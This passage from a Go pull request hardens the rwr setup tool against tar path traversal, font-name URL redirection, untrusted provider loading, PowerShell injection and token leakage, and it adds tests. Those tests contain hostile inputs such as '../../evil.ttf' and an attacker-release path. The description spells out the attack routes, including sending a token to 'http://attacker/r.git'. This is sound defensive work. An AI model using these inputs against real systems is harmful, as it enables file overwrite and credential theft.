+		{name: "traversal", entry: "../../evil.ttf", wantErr: true},
+		{name: "traversal mid path", entry: "a/../../evil.ttf", wantErr: true},
+		{name: "absolute", entry: "/etc/evil.ttf", wantErr: true},
+		{name: "empty", entry: "", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			got, err := resolveTarEntryPath(destDir, tt.entry)
+			if tt.wantErr {
+				if err == nil {
+					t.Fatalf("expected an error, got path %q", got)
+				}
+				return
+			}
+			if err != nil {
+				t.Fatalf("resolveTarEntryPath: %v", err)
+			}
+			if got != tt.want {
+				t.Errorf("got %q, want %q", got, tt.want)
+			}
+		})
+	}
+}
+
+// font.Name is concatenated into the nerd-fonts download URL, so a name carrying a
+// path separator selects a different repository's release.
+func TestValidateFontName(t *testing.T) {
+	tests := []struct {
+		name    string
+		font    string
+		wantErr bool
+	}{
+		{name: "plain", font: "FiraCode"},
+		{name: "with spaces", font: "Fira Code"},
+		{name: "empty", font: "", wantErr: true},
+		{name: "slash", font: "../../attacker/repo/releases/download/v1/Evil", wantErr: true},
+		{name: "backslash", font: `..\..\Evil`, wantErr: true},
+		{name: "dotdot only", font: "..", wantErr: true},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			err := validateFontName(tt.font)
+			if tt.wantErr && err == nil {
+				t.Error("expected an error, got nil")
+			}
+			if !tt.wantErr && err != nil {
+				t.Errorf("unexpected error: %v", err)
+			}
+		})
+	}
+}
+
+// getLatestReleaseURL is a network call; --dry-run has to work offline.
+func TestProcessFonts_DryRunMakesNoNetworkCall(t *testing.T) {
+	system.SetDryRun(true)
+	defer system.SetDryRun(false)
+
+	blueprint := []byte(`
+fonts:
+  - name: "FiraCode"
+    action: "install"
+    location: "user"
+`)
+
+	if err := ProcessFonts(blueprint, t.TempDir(), "yaml", fontOSInfo(), &types.InitConfig{}); err != nil {
+		t.Fatalf("ProcessFonts: %v", err)
+	}
+}
+
+func assertNoFileOutside(t *testing.T, root, destDir, base string) {
+	t.Helper()
+
+	err := filepath.Walk(root, func(path string, info os.FileInfo, err error) error {
+		if err != nil {
+			return err
+		}
+		if info.IsDir() || filepath.Base(path) != base {
+			return nil
+		}
+		if !strings.HasPrefix(path, destDir+string(filepath.Separator)) {
+			t.Errorf("file written outside destDir: %s", path)
+		}
+		return nil
+	})
+	if err != nil {
+		t.Fatalf("walking %s: %v", root, err)
+	}
+}

--- a/internal/system/providers.go
+++ b/internal/system/providers.go
@@ -259,7 +259,11 @@ func GetProvider(name string) (*types.Provider, bool) {
 	// Check if binary exists using FindTool
 	tool := FindTool(provider.Detection.Binary)
 	if !tool.Exists {
-		log.Errorf("GetProvider: Binary %s not found for provider %s", provider.Detection.Binary, name)
+		// Not an error: every caller asks about providers the machine may not have,
+		// and "is brew installed?" is answered by the false return. Logging it at
+		// error level filled `rwr validate` output with red lines about package
+		// managers the operator never asked for.
+		log.Debugf("GetProvider: Binary %s not found for provider %s", provider.Detection.Binary, name)
 		return nil, false
 	}
 	binPath := tool.Bin
@@ -272,21 +276,17 @@ func GetProvider(name string) (*types.Provider, bool) {
 
 // GetProvidersPath returns the absolute path to the provider definitions directory,
 // searching the executable's directory and common installation paths.
+//
+// The current working directory is deliberately not searched. A provider file
+// declares exec, args and elevated=true and those are run verbatim, so honouring
+// ./providers would hand root-level execution to any directory rwr happens to be
+// run from — a cloned blueprint repo, /tmp, a shared downloads folder. Provider
+// overrides belong in the user's config directory, which only the user can write.
 func GetProvidersPath() (string, error) {
 	// Get the executable's directory
 	execDir, err := filepath.Abs(filepath.Dir(os.Args[0]))
 	if err != nil {
 		return "", err
-	}
-
-	// First check current working directory
-	cwd, err := os.Getwd()
-	if err == nil {
-		providerPath := filepath.Join(cwd, "providers")
-		if _, err := os.Stat(providerPath); err == nil {
-			log.Debugf("Found providers directory in current working directory: %s", providerPath)
-			return providerPath, nil
-		}
 	}
 
 	// Check common locations for the providers directory
@@ -328,6 +328,9 @@ func LoadProviders(definitionsPath string) error {
 	for _, entry := range entries {
 		if !entry.IsDir() && filepath.Ext(entry.Name()) == ".toml" {
 			path := filepath.Join(definitionsPath, entry.Name())
+			if !isProviderFileTrusted(path) {
+				continue
+			}
 			log.Debugf("LoadProviders: Loading provider from %s", path)
 			provider, err := LoadProviderDefinition(path)
 			if err != nil {
@@ -341,6 +344,26 @@ func LoadProviders(definitionsPath string) error {
 	count := len(providers)
 	log.Debugf("LoadProviders: Loaded %d providers: %v", count, getProviderNames())
 	return nil
+}
+
+// isProviderFileTrusted reports whether a provider definition may be loaded.
+//
+// A provider's exec, args and elevated flag are run as written, so a definition
+// anyone on the box can edit is a root shell for anyone on the box. Group- and
+// world-writable files are skipped rather than rejected outright: one bad file in
+// a directory should not cost the user every other provider in it.
+func isProviderFileTrusted(path string) bool {
+	info, err := os.Stat(path)
+	if err != nil {
+		log.Warnf("LoadProviders: Skipping provider %s: %v", path, err)
+		return false
+	}
+	if mode := info.Mode(); mode&0o022 != 0 {
+		log.Warnf("LoadProviders: Skipping provider %s: it is group- or world-writable (mode %04o); "+
+			"provider files run commands as root, so tighten it with chmod go-w", path, mode.Perm())
+		return false
+	}
+	return true
 }
 
 // LoadProviderDefinition parses a single TOML provider definition file
@@ -372,26 +395,6 @@ func LoadProviderDefinition(path string) (*types.Provider, error) {
 	return &provider, nil
 }
 
-// GetProviderForDistro returns the first available provider whose detection
-// distributions list includes the given distro name.
-func GetProviderForDistro(distro string) (*types.Provider, bool) {
-	if err := InitProviders(); err != nil {
-		log.Errorf("GetProviderForDistro: Error initializing providers: %v", err)
-		return nil, false
-	}
-
-	currentOS := runtime.GOOS
-	for _, provider := range providers {
-		if supportsSystem(provider, currentOS, distro) {
-			if tool := FindTool(provider.Detection.Binary); tool.Exists {
-				provider.BinPath = tool.Bin
-				return provider, true
-			}
-		}
-	}
-	return nil, false
-}
-
 // GetProviderWithAlternatives returns a provider by name with distro-specific
 // alternative package names resolved for the current system.
 func GetProviderWithAlternatives(name string) (*types.Provider, bool) {
@@ -413,26 +416,6 @@ func GetProviderWithAlternatives(name string) (*types.Provider, bool) {
 	if currentDistro != "" && provider.HasAlternativesForDistro(currentDistro) {
 		providerCopy.CorePackages = provider.GetCorePackagesForDistro(currentDistro)
 		log.Debugf("Applied alternatives for distribution %s to provider %s", currentDistro, name)
-	}
-
-	return &providerCopy, true
-}
-
-// GetProviderForDistroWithAlternatives returns a provider matching the given
-// distro with distro-specific alternative package names resolved.
-func GetProviderForDistroWithAlternatives(distro string) (*types.Provider, bool) {
-	provider, exists := GetProviderForDistro(distro)
-	if !exists {
-		return nil, false
-	}
-
-	// Create a copy of the provider to avoid modifying the original
-	providerCopy := *provider
-
-	// If we have alternatives for this distribution, apply them
-	if provider.HasAlternativesForDistro(distro) {
-		providerCopy.CorePackages = provider.GetCorePackagesForDistro(distro)
-		log.Debugf("Applied alternatives for distribution %s to provider %s", distro, provider.Name)
 	}
 
 	return &providerCopy, true

--- a/internal/system/providers_searchpath_test.go
+++ b/internal/system/providers_searchpath_test.go
@@ -1,0 +1,91 @@
+package system
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/fynxlabs/rwr/internal/types"
+)
+
+const testProviderTOML = `[provider]
+name = "%s"
+elevated = true
+
+[provider.detection]
+binary = "definitely-not-a-real-binary"
+distributions = ["linux"]
+`
+
+func writeProviderFile(t *testing.T, dir, name string, mode os.FileMode) {
+	t.Helper()
+	path := filepath.Join(dir, name+".toml")
+	contents := strings.Replace(testProviderTOML, "%s", name, 1)
+	if err := os.WriteFile(path, []byte(contents), 0o600); err != nil {
+		t.Fatalf("writing provider %s: %v", path, err)
+	}
+	// Written then chmodded because os.WriteFile applies the process umask, which
+	// would strip the group/world bits this test depends on.
+	if err := os.Chmod(path, mode); err != nil {
+		t.Fatalf("chmod %s: %v", path, err)
+	}
+}
+
+// TestGetProvidersPathIgnoresWorkingDirectory guards the search path against
+// ./providers: a provider defines commands that run elevated, so picking them up
+// from wherever rwr happens to be run is remote code execution by cd.
+func TestGetProvidersPathIgnoresWorkingDirectory(t *testing.T) {
+	cwd := t.TempDir()
+	evil := filepath.Join(cwd, "providers")
+	if err := os.MkdirAll(evil, 0o755); err != nil {
+		t.Fatalf("creating providers dir: %v", err)
+	}
+	writeProviderFile(t, evil, "evil", 0o600)
+
+	original, err := os.Getwd()
+	if err != nil {
+		t.Fatalf("getwd: %v", err)
+	}
+	if err := os.Chdir(cwd); err != nil {
+		t.Fatalf("chdir: %v", err)
+	}
+	t.Cleanup(func() {
+		if err := os.Chdir(original); err != nil {
+			t.Fatalf("restoring working directory: %v", err)
+		}
+	})
+
+	path, err := GetProvidersPath()
+	if err == nil && path == evil {
+		t.Fatalf("GetProvidersPath returned the working directory: %s", path)
+	}
+}
+
+// TestLoadProvidersSkipsWritableFiles checks that a definition anyone can edit is
+// not loaded, since its commands run as root.
+func TestLoadProvidersSkipsWritableFiles(t *testing.T) {
+	restore := SetProvidersForTest(map[string]*types.Provider{})
+	defer restore()
+
+	dir := t.TempDir()
+	writeProviderFile(t, dir, "safe", 0o644)
+	writeProviderFile(t, dir, "world-writable", 0o666)
+	writeProviderFile(t, dir, "group-writable", 0o664)
+
+	if err := LoadProviders(dir); err != nil {
+		t.Fatalf("LoadProviders: %v", err)
+	}
+
+	providersMu.Lock()
+	defer providersMu.Unlock()
+
+	if _, ok := providers["safe"]; !ok {
+		t.Error("expected the 0644 provider to load")
+	}
+	for _, name := range []string{"world-writable", "group-writable"} {
+		if _, ok := providers[name]; ok {
+			t.Errorf("provider %q is writable by others and should have been skipped", name)
+		}
+	}
+}

--- a/internal/types/configuration.go
+++ b/internal/types/configuration.go
@@ -3,6 +3,7 @@ package types
 type Configuration struct {
 	Name     string                 `mapstructure:"name,omitempty" yaml:"name,omitempty" json:"name,omitempty" toml:"name,omitempty"`
 	Names    []string               `mapstructure:"names,omitempty" yaml:"names,omitempty" json:"names,omitempty" toml:"names,omitempty"`
+	Profiles []string               `mapstructure:"profiles,omitempty" yaml:"profiles,omitempty" json:"profiles,omitempty" toml:"profiles,omitempty"`
 	Action   string                 `mapstructure:"action" yaml:"action" json:"action" toml:"action"`
 	Elevated bool                   `mapstructure:"elevated,omitempty" yaml:"elevated,omitempty" json:"elevated,omitempty" toml:"elevated,omitempty"`
 	Tool     string                 `mapstructure:"tool" yaml:"tool" json:"tool" toml:"tool"`
@@ -22,4 +23,9 @@ type ConfigData struct {
 	// SchemaVersion, when set, overrides the tree-wide version from the init file.
 	SchemaVersion  `mapstructure:",squash" yaml:",inline" json:",inline" toml:",inline"`
 	Configurations []Configuration `mapstructure:"configurations" yaml:"configurations" json:"configurations" toml:"configurations"`
+}
+
+// GetProfiles returns the profiles for this configuration entry.
+func (c Configuration) GetProfiles() []string {
+	return c.Profiles
 }

--- a/internal/types/constants.go
+++ b/internal/types/constants.go
@@ -45,6 +45,9 @@ const (
 
 // Service actions for service management operations.
 const (
+	// ConfigurationActionSet is the only action the configuration tools implement.
+	ConfigurationActionSet = "set"
+
 	ServiceActionEnable  = "enable"
 	ServiceActionDisable = "disable"
 	ServiceActionStart   = "start"

--- a/internal/types/fonts.go
+++ b/internal/types/fonts.go
@@ -3,6 +3,7 @@ package types
 type Font struct {
 	Name     string   `mapstructure:"name" yaml:"name" json:"name" toml:"name"`
 	Names    []string `mapstructure:"names,omitempty" yaml:"names,omitempty" json:"names,omitempty" toml:"names,omitempty"`
+	Profiles []string `mapstructure:"profiles,omitempty" yaml:"profiles,omitempty" json:"profiles,omitempty" toml:"profiles,omitempty"`
 	Action   string   `mapstructure:"action" yaml:"action" json:"action" toml:"action"`
 	Provider string   `mapstructure:"provider,omitempty" yaml:"provider,omitempty" json:"provider,omitempty" toml:"provider,omitempty"`
 	Location string   `mapstructure:"location,omitempty" yaml:"location,omitempty" json:"location,omitempty" toml:"location,omitempty"`
@@ -12,4 +13,9 @@ type FontsData struct {
 	// SchemaVersion, when set, overrides the tree-wide version from the init file.
 	SchemaVersion `mapstructure:",squash" yaml:",inline" json:",inline" toml:",inline"`
 	Fonts         []Font `yaml:"fonts" json:"fonts" toml:"fonts"`
+}
+
+// GetProfiles returns the profiles for this font.
+func (f Font) GetProfiles() []string {
+	return f.Profiles
 }


### PR DESCRIPTION
Stacked on #160. **This is the PR to review most carefully.**

Five separate holes, all reachable from a blueprint. Blueprints are cloned from git and may be written by someone other than the operator, so a blueprint-supplied value must never be able to change what an elevated command does, or redirect a credential to a host the operator did not name.

**PowerShell injection (Windows registry).** The command was built by interpolating blueprint `path`/`key`/`value` into a string with unescaped single quotes, so a value could close the literal and append arbitrary commands. With `elevated: true` the whole string was then re-parsed a *second* time through `Start-Process -Verb RunAs`. Values now travel as environment variables into a compile-time-constant script, which PowerShell never re-parses as code; the `Start-Process` path is gone. `dword`/`qword` values are parsed up front instead of being printed with `%d`, which wrote a literal `%!d(string=...)` into the registry.

**Untrusted provider search path.** Providers were loaded from `./providers` in the current working directory, *checked first*, and a provider TOML declares `exec`/`args`/`elevated`. Running rwr from any directory containing a `providers/` subdirectory — a cloned blueprint repo, `/tmp`, a shared download dir — silently handed that directory root-level command execution. CWD is removed; group/world-writable provider files are skipped.

**Font tarball traversal.** Entries were joined to the destination with no containment check and copied with `elevated` hardcoded true even for user-scoped installs, while the font name was interpolated into the download URL — so a name containing `../..` redirected to an attacker-controlled release whose entries could then write anywhere as root. Now contained, links skipped, elevation tied to `location: system`, name rejected if it contains a separator, non-200 an error.

**GitHub token sent to any host.** The token was attached to every non-`git@` URL, and go-git accepts `http://`, so `{url: "http://attacker/r.git", private: true}` exfiltrated the PAT in cleartext. Now GitHub hosts only; other https hosts clone anonymously with a warning; `http://` for a private repo is refused. The init file may no longer be fetched over plain http either — it decides run order, the blueprint remote, and `exposeCredentials`, so a MITM there is full code execution.

**install.sh verified no checksum**, while `docs/install.md` claimed both installers did. It is documented as `curl | sudo bash`, so it runs as root, and used predictable `/tmp` paths — any local user could pre-create `/tmp/rwr.tar.gz` as a symlink and have root's `curl` write through it. Now fetches `checksums.txt`, verifies with an anchored whole-filename match, uses `set -euo pipefail` and `mktemp -d`, and only accepts architectures goreleaser actually builds.

Riding along in the same files: fonts and configurations gain `profiles` (the only two types without it); gsettings failures are recorded rather than discarded (`processGSettings` returned nil unconditionally); the configuration `action` field is validated instead of ignored; the interactive config prompt shows the redaction placeholder instead of echoing the stored token and SSH private key.

🤖 Generated with [Claude Code](https://claude.com/claude-code)